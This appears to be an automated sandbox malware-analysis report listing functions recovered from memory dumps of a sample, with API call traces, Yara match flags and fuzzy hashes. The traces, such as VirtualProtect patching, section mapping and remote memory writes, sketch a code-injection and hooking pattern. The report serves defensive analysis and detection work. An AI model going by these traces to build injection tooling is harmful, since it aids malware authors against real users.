Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B1A052
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00B1A05F
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00B1A0EB
GetModuleHandleA.KERNEL32(00000000), ref: 00B1A0F6
RtlImageNtHeader.NTDLL(00000000), ref: 00B1A0FF
RtlExitUserThread.NTDLL(00000000), ref: 00B1A114

Part of subcall function 00B28B88: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B1A08D,?), ref: 00B28B90
Part of subcall function 00B28B88: GetVersion.KERNEL32 ref: 00B28B9F
Part of subcall function 00B28B88: GetCurrentProcessId.KERNEL32 ref: 00B28BAE
Part of subcall function 00B28B88: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00B28BCB

Part of subcall function 00B18CA2: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00B18CF4
Part of subcall function 00B18CA2: memcpy.NTDLL(?,?,?,?,?,?), ref: 00B18D85
Part of subcall function 00B18CA2: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B18DA0

Part of subcall function 00B13CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B2F65A), ref: 00B13CCA

Part of subcall function 00B233D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00B14655,00000000), ref: 00B233EE
Part of subcall function 00B233D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,00B14655,00000000), ref: 00B233FF
Part of subcall function 00B233D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00B14655,00000000), ref: 00B23412

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateFileModuleOpenThreadTimeVirtual$AllocChangeCloseCurrentEventExitFindFreeHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 1973333951-0
Opcode ID: 22fbd5259dca892a278c4363d769f5f17a5e75cbdcb5af56e35c269526986674
Instruction ID: 0ee9a9370163e04652d2e305175257e184ac1a1245bb34efb0e1024e4472e7b5
Opcode Fuzzy Hash: 22fbd5259dca892a278c4363d769f5f17a5e75cbdcb5af56e35c269526986674
Instruction Fuzzy Hash: 3131C472901218EFCB21AF74DC899AEBBF8EB45750F6001A9F502E7150DA70ED84C752

Uniqueness

Uniqueness Score: -1.00%

Function 001F24C2, Relevance: 9.1, APIs: 6, Instructions: 72sleepmemorytimeCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 001F24D7
GetTickCount.KERNEL32 ref: 001F24EE
GetSystemTimeAsFileTime.KERNEL32(?,?), ref: 001F250E
SwitchToThread.KERNEL32 ref: 001F2514
Sleep.KERNELBASE(00000002,00000000,?,?,00000009,00000000), ref: 001F254A
IsWow64Process.KERNEL32(001FD20C,?), ref: 001F2568

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64
String ID:
API String ID: 4160108930-0
Opcode ID: 263090bd6c94dbeec6249a4aa0e4e35c9fefd90bc02e654881486b8dc67a2af9
Instruction ID: 96b7cb7b2d44f25716610af846432dcedb97771e80a5552170211723783b4742
Opcode Fuzzy Hash: 263090bd6c94dbeec6249a4aa0e4e35c9fefd90bc02e654881486b8dc67a2af9
Instruction Fuzzy Hash: 5221E7B2A0420DAFD710DF64EC99ABA77A9FB44350F00452DF605C2560EBB4DC84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001F8B98, Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,001F725B), ref: 001F8BCF
GetUserNameW.ADVAPI32(00000000,001F725B), ref: 001F8BF3
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,001F725B,?,?,?,?,?,001F258B), ref: 001F8C14
HeapFree.KERNEL32(00000000,00000000), ref: 001F8C7A

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: FreeHeapNameUser
String ID:
API String ID: 97367500-0
Opcode ID: 05e12ce164fb76f16739107b123a225dbab107831329f2402f715e2bb02c1698
Instruction ID: 01bb05a6511dc8c53f05569ea27cc93a7f368764be339f86f12db452f1cadc7a
Opcode Fuzzy Hash: 05e12ce164fb76f16739107b123a225dbab107831329f2402f715e2bb02c1698
Instruction Fuzzy Hash: 07310576A00209EFDB10DFA9DC81ABEB7F9FB58314F214469E605D2250DB30EE41DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B1E010, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 00B1E06D

Part of subcall function 00B347A1: NtMapViewOfSection.NTDLL(00000000,000000FF,00B1E084,00000000,00000000,00B1E084,?,00000002,00000000,?,?,00000000,00B1E084,000000FF,?), ref: 00B347CF

memset.NTDLL ref: 00B1E091

Strings

@, xrefs: 00B1E05D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: d4b1298c01fb4ac9fb96f34190785aca84eb350c347e04818a77a1ba4a29845e
Instruction ID: a05b395714762f866a160700bc90704904db3fa3f9be3f6e6f75e89cd54701b2
Opcode Fuzzy Hash: d4b1298c01fb4ac9fb96f34190785aca84eb350c347e04818a77a1ba4a29845e
Instruction Fuzzy Hash: 5C213BB6D0020DAFDB10DFA9C8859EEFBF9FB48350F604569E916F3250D770AA448B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B26CBC, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00B26CE1
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B26CFD

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

Part of subcall function 00B2AC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00B2ACBD
Part of subcall function 00B2AC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00B26D3E,00000000,00000000,00000028,00000100), ref: 00B2ACDF

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00B26E67

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: 3e78049b0a7098be4d46c4c5b7a2713b178e7884f62bca64504961bb62262ebc
Instruction ID: 0f46dbf63c519ac638627ee6434751c4d44f6411e5ff5f546ac903b85e5a36ef
Opcode Fuzzy Hash: 3e78049b0a7098be4d46c4c5b7a2713b178e7884f62bca64504961bb62262ebc
Instruction Fuzzy Hash: BA613975A0021AEFDB15DFA8D880BAEBBF4FF08304F1144A9E918E7251D774E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B17E14, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B17E28
GetProcAddress.KERNEL32(6F57775A), ref: 00B17E50
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 00B17E6E

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: 2e388935dc52d36fbfb25ee1b13ac74d49d77376dd020c7d9c19ba60b630ff5f
Instruction ID: 0ad85f1203508e369f3593316f784e4b85c4f9d912afcf96563e10ed0fc1f465
Opcode Fuzzy Hash: 2e388935dc52d36fbfb25ee1b13ac74d49d77376dd020c7d9c19ba60b630ff5f
Instruction Fuzzy Hash: 2F118C32A04219AFEB04DB54DC49FAE77FDEB84700F4400A5A908EB290DBB0ED49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B19DAC, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00B329D7,00000000,00000000,00B329D7,00003000,00000040), ref: 00B19DDD
RtlNtStatusToDosError.NTDLL(00000000), ref: 00B19DE4
SetLastError.KERNEL32(00000000), ref: 00B19DEB

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Error$AllocateLastMemoryStatusVirtual
String ID:
API String ID: 722216270-0
Opcode ID: 184e5db22902baf9d0af5e1857a2927c43b15f97869b0dac55cb8173a8d47ff0
Instruction ID: f10229f980cd032ed05001205024e5e4dc32df31d57b9e90451061bbc9691722
Opcode Fuzzy Hash: 184e5db22902baf9d0af5e1857a2927c43b15f97869b0dac55cb8173a8d47ff0
Instruction Fuzzy Hash: 80F05E71510309FBEB05CB94DD5ABEE77BCEB14305F504058B204A7080EFB4AB04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B137E7, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,00B32A79,00000000,?,00B32A79,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 00B13805
RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B13814
SetLastError.KERNEL32(00000000,?,00B32A79,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 00B1381B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Error$LastMemoryStatusVirtualWrite
String ID:
API String ID: 1089604434-0
Opcode ID: 24c959b9da9103ea21ec79057188388bf2d9f140d17f01f239ded6a7a7a3f298
Instruction ID: b4a026d84b37e3024e5b9d4c9d6123e0cf2f1c4c7a003e7d1f7ed195953be9aa
Opcode Fuzzy Hash: 24c959b9da9103ea21ec79057188388bf2d9f140d17f01f239ded6a7a7a3f298
Instruction Fuzzy Hash: 5CE01A3260021AABCF125FE8AC04D9F7BA9FB08B50B508020BE05D3120EA31D961ABE1

Uniqueness

Uniqueness Score: -1.00%

Function 001F6EF1, Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,001FC048,00000000,00000000,001F4909), ref: 001F6F4E

Part of subcall function 001F9DDB: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,001F6F63,00000002,00000000,?,?,00000000,?,?,001F6F63,00000000), ref: 001F9E08

memset.NTDLL ref: 001F6F70

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: 879a24f836db0a2e68725ef86fcbc3df4136c0104d5ef7748db91ceb0164cce0
Instruction ID: 576fb5dea02bc302b2286b28cbaa0d0c92c6ef3d9375d917250476b7e1299766
Opcode Fuzzy Hash: 879a24f836db0a2e68725ef86fcbc3df4136c0104d5ef7748db91ceb0164cce0
Instruction Fuzzy Hash: E2211DB1D0020DAFCB11DFA9C8849EEFBB9EF48354F108469E606F3210D730AA458FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B2AC94, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00B2ACBD
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00B26D3E,00000000,00000000,00000028,00000100), ref: 00B2ACDF

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 3a189919489c6c6c88e08bae08efba7db4a5fcb9aeee7e86cd2303577f10b054
Instruction ID: 3c692218657bff95f23a0976f90abcaa4859dfd40a9eb737a270bec37f79b6ac
Opcode Fuzzy Hash: 3a189919489c6c6c88e08bae08efba7db4a5fcb9aeee7e86cd2303577f10b054
Instruction Fuzzy Hash: 28F04971500105BFCB058F85DC44C9EBBFAFB84340720405AF514D7270DA70E952DB20

Uniqueness

Uniqueness Score: -1.00%

Function 001F229C, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000), ref: 001F22FA

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bb2c4ba70f6eb3bcbb92877eb1c94d4c91c3dd4cd8a5a42f88c9d0d19bf94e4e
Instruction ID: f7a5c1aaae0d7a79951f31da85ab9edce0d356ac5c1a8cc0f4a7c79ef25c5246
Opcode Fuzzy Hash: bb2c4ba70f6eb3bcbb92877eb1c94d4c91c3dd4cd8a5a42f88c9d0d19bf94e4e
Instruction Fuzzy Hash: DCF0307660102C6BD720A76A9C49EFB76ACEBD9710F010061FB59D3005EB349A9696F1

Uniqueness

Uniqueness Score: -1.00%

Function 001F9DDB, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,001F6F63,00000002,00000000,?,?,00000000,?,?,001F6F63,00000000), ref: 001F9E08

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: e59c4d7ac42f2ab7ca71dfef340e80951b40f935e8fda59184247052a9a5bac8
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: B4F01CB690020CBFEB119FA5CC85DAFBBBDEB44394B104939B652E2091D7319E589A60

Uniqueness

Uniqueness Score: -1.00%

Function 00B347A1, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,00B1E084,00000000,00000000,00B1E084,?,00000002,00000000,?,?,00000000,00B1E084,000000FF,?), ref: 00B347CF

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction ID: 1ed768ac371aed478d3137449a901df359ba5d84514d05fb80c249f9cbae5f23
Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction Fuzzy Hash: 88F0FEB690020CFFDB119FA5CC85C9FBBBDEB45345F108869F542D1450D331AE189B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2CD7A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00B3E240), ref: 00B2CD91

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: aa87408c3d37eb4831af8761f55e38d5c2eacd3d4f32597ecce8325279e4ccdb
Instruction ID: 81e66f91d920755c450857bd84fcff489fa37d6e03cff470ec7224a72eb87df0
Opcode Fuzzy Hash: aa87408c3d37eb4831af8761f55e38d5c2eacd3d4f32597ecce8325279e4ccdb
Instruction Fuzzy Hash: 1BF03435300129AB8B20DA59EC85EEFBFA9EB05790B5041B6E908DB264D630ED05CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A87A, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00B325B8), ref: 00B1A8A3
RtlDeleteCriticalSection.NTDLL(00B3E220), ref: 00B1A8D6
RtlDeleteCriticalSection.NTDLL(00B3E240), ref: 00B1A8DD
CloseHandle.KERNEL32(?,?,00B325B8), ref: 00B1A90C
ReleaseMutex.KERNEL32(000003E4,00000000,?,?,?,00B325B8), ref: 00B1A91D
FindCloseChangeNotification.KERNELBASE(?,?,00B325B8), ref: 00B1A929
ResetEvent.KERNEL32(00000000,00000000,?,?,?,00B325B8), ref: 00B1A935
CloseHandle.KERNEL32(?,?,00B325B8), ref: 00B1A941
SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00B325B8), ref: 00B1A947
SleepEx.KERNEL32(00000064,00000001,?,?,00B325B8), ref: 00B1A95B
HeapFree.KERNEL32(00000000,00000000,?,?,00B325B8), ref: 00B1A97E
RtlRemoveVectoredExceptionHandler.NTDLL(00B505B8), ref: 00B1A9B7
SleepEx.KERNELBASE(00000064,00000001,?,?,00B325B8), ref: 00B1A9D3
FindCloseChangeNotification.KERNELBASE(05778548,?,?,00B325B8), ref: 00B1A9FA
LocalFree.KERNEL32(?,?,00B325B8), ref: 00B1AA0A

Part of subcall function 00B263E9: GetVersion.KERNEL32(?,00000000,73BCF720,?,00B1A894,00000000,?,?,?,00B325B8), ref: 00B2640D
Part of subcall function 00B263E9: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,00B1A894,00000000,?,?,?,00B325B8), ref: 00B26421
Part of subcall function 00B263E9: GetProcAddress.KERNEL32(00000000), ref: 00B26428

Part of subcall function 00B19882: RtlEnterCriticalSection.NTDLL(00B3E240), ref: 00B1988C
Part of subcall function 00B19882: RtlLeaveCriticalSection.NTDLL(00B3E240), ref: 00B198C8

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalSectionSleep$Handle$ChangeDeleteFindFreeNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 2858272568-0
Opcode ID: 1a77977b5f3e94a4ebd82b6c0e25821fa35bd84a82a3cc0ac5a18087e3c94d73
Instruction ID: a374cdbe144656267ac8c1612f2f55a769f36271380d2547d0a417328cf26d50
Opcode Fuzzy Hash: 1a77977b5f3e94a4ebd82b6c0e25821fa35bd84a82a3cc0ac5a18087e3c94d73
Instruction Fuzzy Hash: 5D415E316412059BD724AF64EDC6A9D77EAEB00340BA50466F525E71B0CFB1ECC4CF62

Uniqueness

Uniqueness Score: -1.00%

Function 001F90BA, Relevance: 19.8, APIs: 13, Instructions: 266memorystringCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 001F90D1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001F920E
GetTickCount.KERNEL32 ref: 001F921F
RtlEnterCriticalSection.NTDLL(001FD294), ref: 001F9233
RtlLeaveCriticalSection.NTDLL(001FD294), ref: 001F9251

Part of subcall function 001F49EC: lstrcat.KERNEL32(00000000,00000000), ref: 001F4A41
Part of subcall function 001F49EC: StrTrimA.SHLWAPI(00000000,001FC2C0,00000000,00000000,001F3E0F,?,00000000,001F3E0F,00000000,001FD2D4), ref: 001F4A5E

StrTrimA.SHLWAPI(00000000,001FC2C4,?,001FD2D4), ref: 001F9286

Part of subcall function 001F9FA4: lstrcpy.KERNEL32(00000000,?), ref: 001F9FCF
Part of subcall function 001F9FA4: lstrcat.KERNEL32(00000000,?), ref: 001F9FDA

lstrcpy.KERNEL32(00000000,?), ref: 001F92B2

Part of subcall function 001F8DEA: lstrlen.KERNEL32(?,?,?,?,001F2376,?), ref: 001F8DF3
Part of subcall function 001F8DEA: mbstowcs.NTDLL ref: 001F8E1A
Part of subcall function 001F8DEA: memset.NTDLL ref: 001F8E2C

wcstombs.NTDLL ref: 001F935D

Part of subcall function 001F9A14: SysAllocString.OLEAUT32(00000000), ref: 001F9A55
Part of subcall function 001F9A14: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,?,00000000), ref: 001F9AD7
Part of subcall function 001F9A14: StrStrIW.SHLWAPI(00000000,?), ref: 001F9B16

Part of subcall function 001FA07B: RtlFreeHeap.NTDLL(00000000,?,001F2292,?), ref: 001FA087

RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 001F939E
RtlFreeHeap.NTDLL(00000000,00000000,?,00000000), ref: 001F93AE
RtlFreeHeap.NTDLL(00000000,00000000,?,001FD2D4), ref: 001F93BE
HeapFree.KERNEL32(00000000,?), ref: 001F93CE
RtlFreeHeap.NTDLL(00000000,?), ref: 001F93DC

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Heap$Free$CountCriticalSectionTickTrimlstrcatlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_lstrlenmbstowcsmemsetwcstombs
String ID:
API String ID: 3998749371-0
Opcode ID: ed32410fc3139ea0b44cfec93558470cb400ba96e97649a2f1cb5cb9cfad9711
Instruction ID: c8b6ae51185232a3b0b65465c0042937d6e9e8602c63bd5eec9ac261415da375
Opcode Fuzzy Hash: ed32410fc3139ea0b44cfec93558470cb400ba96e97649a2f1cb5cb9cfad9711
Instruction Fuzzy Hash: 2DA129B1500109EFCB11EF68ED89EBA3BAAFF58354B154065F909C7660DB30E991DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1EC30, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B1EC7D
VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275), ref: 00B1EC8F
lstrcpy.KERNEL32(00000000,?), ref: 00B1EC9E
VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275), ref: 00B1ECAF
VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,00B3A4F8,00000018,00B17458,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000), ref: 00B1ECE5
VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275), ref: 00B1ED00
VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,00B3A4F8,00000018,00B17458,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000), ref: 00B1ED15
VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,00B3A4F8,00000018,00B17458,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000), ref: 00B1ED42
VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275), ref: 00B1ED5C
GetLastError.KERNEL32(?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B1ED63

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 9000e131376ccfe89802765b8c3aa10433f3d7b4a3f9f78fee4b02234a3f1cdb
Instruction ID: 33862697de7e39793d0fd52a3ea32265753b86cddda783c71cbbae86c1aec378
Opcode Fuzzy Hash: 9000e131376ccfe89802765b8c3aa10433f3d7b4a3f9f78fee4b02234a3f1cdb
Instruction Fuzzy Hash: C2415FB1900B099FDB318F64DC44EAAB7F4FF08310F508569EA65A76A0DB34E945DF60

Uniqueness

Uniqueness Score: -1.00%

Function 001F9C23, Relevance: 12.1, APIs: 8, Instructions: 149timememoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001F9C38
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001F9C44
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 001F9C69
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 001F9C85
RtlFreeHeap.NTDLL(00000000,00000000), ref: 001F9D33
CloseHandle.KERNEL32(?), ref: 001F9D42
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 001F9D7C

Part of subcall function 001F4B22: StrToIntExW.SHLWAPI(?,00000000,?,?,?,003FBFB0,00000000,?,001FC068,00000000,001FC040), ref: 001F4B71

GetLastError.KERNEL32 ref: 001F9DAF

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: TimerWaitable_allmul$CloseCreateErrorFreeHandleHeapLastmemset
String ID:
API String ID: 3728918242-0
Opcode ID: a48329f05988995835b731aad5c1ce945cec7cd0c77630ec3186da05919c36b1
Instruction ID: afee6ec81bb00b51f9ae1593b34cf299b91381f87740f64e855365f95e7314d3
Opcode Fuzzy Hash: a48329f05988995835b731aad5c1ce945cec7cd0c77630ec3186da05919c36b1
Instruction Fuzzy Hash: 445137B580122DEADF10AFD5DD44EFEBFB9EF09320F204116F615A2291D7749A81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B11000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B35277: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275), ref: 00B3529C
Part of subcall function 00B35277: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B352A4
Part of subcall function 00B35277: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B352BB
Part of subcall function 00B35277: VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?), ref: 00B352E0

GetLastError.KERNEL32(00000000,00000004,00B3D518,00000000,?,00000000,00000002,00B3A568,0000001C,00B25176,00000002,?,00000001,00000000,00B3D514,00000000), ref: 00B11159

Part of subcall function 00B324E0: lstrlen.KERNEL32(6AD68BFC,00B1619F,?,00B1619F,00000004), ref: 00B32518
Part of subcall function 00B324E0: lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 00B3252F
Part of subcall function 00B324E0: StrChrA.SHLWAPI(00000000,0000002E,?,00B1619F,00000004), ref: 00B32538
Part of subcall function 00B324E0: GetModuleHandleA.KERNEL32(00000000,?,00B1619F,00000004), ref: 00B32556

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,00B3D518,00000000,?), ref: 00B110D7
VirtualProtect.KERNELBASE(00000000,00000004,00B3D518,00B3D518,?,00000004,00000000,00000004,00B3D518,00000000,?,00000000,00000002,00B3A568,0000001C,00B25176), ref: 00B110F2
RtlEnterCriticalSection.NTDLL(00B3E240), ref: 00B11116
RtlLeaveCriticalSection.NTDLL(00B3E240), ref: 00B11134

Part of subcall function 00B35277: SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B352E9

Strings

, xrefs: 00B110C6

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: 5df2e6cfc5551c0bece92c842adcb1650da64d9a46cd0f54e4aaac8b3f22b8ae
Instruction ID: 0c758b432a119f34c42337b8540795956e73acca5195a2ab054b17530c57fc32
Opcode Fuzzy Hash: 5df2e6cfc5551c0bece92c842adcb1650da64d9a46cd0f54e4aaac8b3f22b8ae
Instruction Fuzzy Hash: 01413C71900615AFDB10DF59C845ADEFBF8FF08310F248559EA15AB291D770E990CFA1

Uniqueness

Uniqueness Score: -1.00%

